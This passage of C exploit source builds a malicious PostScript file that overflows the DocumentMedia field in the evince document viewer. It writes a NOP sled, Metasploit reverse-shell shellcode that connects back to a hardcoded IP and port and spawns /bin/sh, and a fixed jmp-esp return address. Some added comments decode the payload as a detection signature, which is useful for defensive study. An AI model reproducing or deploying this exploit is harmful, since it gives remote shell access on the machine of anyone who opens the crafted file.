/*
 * Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: evince-ps-field-bof.c
 * Date: 11/27/2006
 * Version: 1.00 - creation
 *
 * Other: this idea originally came from the BID for the 'gv' buffer overflow (20978); I don't
 * believe it was known until now that evince is also vulnerable.
 *
 * Compile: gcc -o epfb evince-ps-field-bof.c -std=c99
 */
13 #include <stdio.h>
14 #include <errno.h>
15 #include <stdlib.h>
16 #include <string.h>
17 #include <arpa/inet.h>
18
// insert shellcode here; I'm not going to implement ip/port changing since
// metasploit's shellcode generation engine does it just fine. I had a picky time
// with the shellcodes -- there must be some bad bytes. This shellcode from
// metasploit works, but be SURE to set Encoder=None.
23
/* linux_ia32_reverse - LHOST=67.76.107.14 LPORT=5555 Size=70 Encoder=None http://metasploit.com */
/*
 * Payload bytes that main() writes into the %%DocumentMedia: field after the
 * 0x90 sled.  Per the generator banner above this is a Metasploit
 * linux_ia32_reverse payload; the five fragments are 16+16+16+16+6 = 70
 * bytes, matching Size=70.  The connect-back endpoint from the banner is
 * embedded as immediates (bytes 43 4c 6b 0e = 67.76.107.14, 15 b3 = port
 * 5555) and the ASCII fragments "//sh" and "/bin" are present verbatim, so
 * every file this tool produces carries those literal byte sequences --
 * useful as a content signature when scanning PostScript inputs.
 */
char cb[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x43\x4c\x6b\x0e\x66\x68"
"\x15\xb3\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

/*
 * Return-address overwrite: the four bytes are 0xffffe777 in little-endian
 * (ia32) order, which the author states holds a "jmp *%esp" on the target
 * build.  It is a fixed absolute address, so it is only valid for one exact
 * binary/stack layout without address randomisation -- NOTE(review): the
 * listing does not say which evince/libc build it was taken from.
 */
char jmpesp[] = "\x77\xe7\xff\xff";
34
35 int main (int argc, char **argv) {
FILE *fh;
if (!(fh = fopen(*(argv+1), "w+b"))) {
printf("%s <file.ps>\n\n", *(argv));
printf("[−] unable to open file ’%s’ for writing: %s\n", *(argv+1), strerror(errno));
exit(1);
}
fputs("%!PS−Adobe−3.0\n", fh);
fputs("%%Title: hello.ps\n", fh);
fputs("%%For: K−sPecial (xzziroz.net) of .aware (awarenetwork.org)\n", fh);
fputs("%%BoundingBox: 24 24 588 768\n", fh);
fputs("%%DocumentMedia: ", fh);
for (int i = 0; i < 100; i++)
fputc(0x90, fh);
fwrite(cb, strlen(cb), 1, fh);
for (int i = strlen(cb) + 100; i < 273; i++)
fputc